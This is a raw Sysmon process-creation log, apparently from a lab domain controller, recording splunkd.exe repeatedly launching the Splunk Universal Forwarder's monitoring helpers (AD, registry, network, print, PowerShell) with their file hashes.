14:13:17.761{A8622C2F-49FD-6078-5406-00000000AE01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:17.095{A8622C2F-49FD-6078-5306-00000000AE01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:23.236{A8622C2F-49C7-6078-5206-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:21.640{A8622C2F-49C5-6078-5106-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:21.104{A8622C2F-49C5-6078-5006-00000000AE01}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:12:20.338{A8622C2F-49C4-6078-4F06-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032353Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:18.462{A8622C2F-49C2-6078-4E06-00000000AE01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032343Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:17.770{A8622C2F-49C1-6078-4D06-00000000AE01}3580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032333Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:17.217{A8622C2F-49C1-6078-4C06-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:23.231{A8622C2F-498B-6078-4B06-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000032201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:21.728{A8622C2F-4989-6078-4A06-00000000AE01}5452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:21.108{A8622C2F-4989-6078-4906-00000000AE01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:20.333{A8622C2F-4988-6078-4806-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:18.548{A8622C2F-4986-6078-4706-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:17.889{A8622C2F-4985-6078-4606-00000000AE01}7032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000032149Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:17.209{A8622C2F-4985-6078-4506-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032060Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:23.217{A8622C2F-494F-6078-4406-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:21.705{A8622C2F-494D-6078-4306-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:21.085{A8622C2F-494D-6078-4206-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:20.315{A8622C2F-494C-6078-4106-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:10:18.527{A8622C2F-494A-6078-4006-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:17.868{A8622C2F-4949-6078-3F06-00000000AE01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:17.188{A8622C2F-4949-6078-3E06-00000000AE01}796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031876Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:23.211{A8622C2F-4913-6078-3D06-00000000AE01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:21.689{A8622C2F-4911-6078-3C06-00000000AE01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:09:21.075{A8622C2F-4911-6078-3B06-00000000AE01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:20.345{A8622C2F-4910-6078-3A06-00000000AE01}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031832Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:18.543{A8622C2F-490E-6078-3906-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031822Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:17.881{A8622C2F-490D-6078-3806-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:17.199{A8622C2F-490D-6078-3706-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000031706Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:23.212{A8622C2F-48D7-6078-3606-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:21.674{A8622C2F-48D5-6078-3506-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031671Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:21.069{A8622C2F-48D5-6078-3406-00000000AE01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031661Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:20.356{A8622C2F-48D4-6078-3306-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 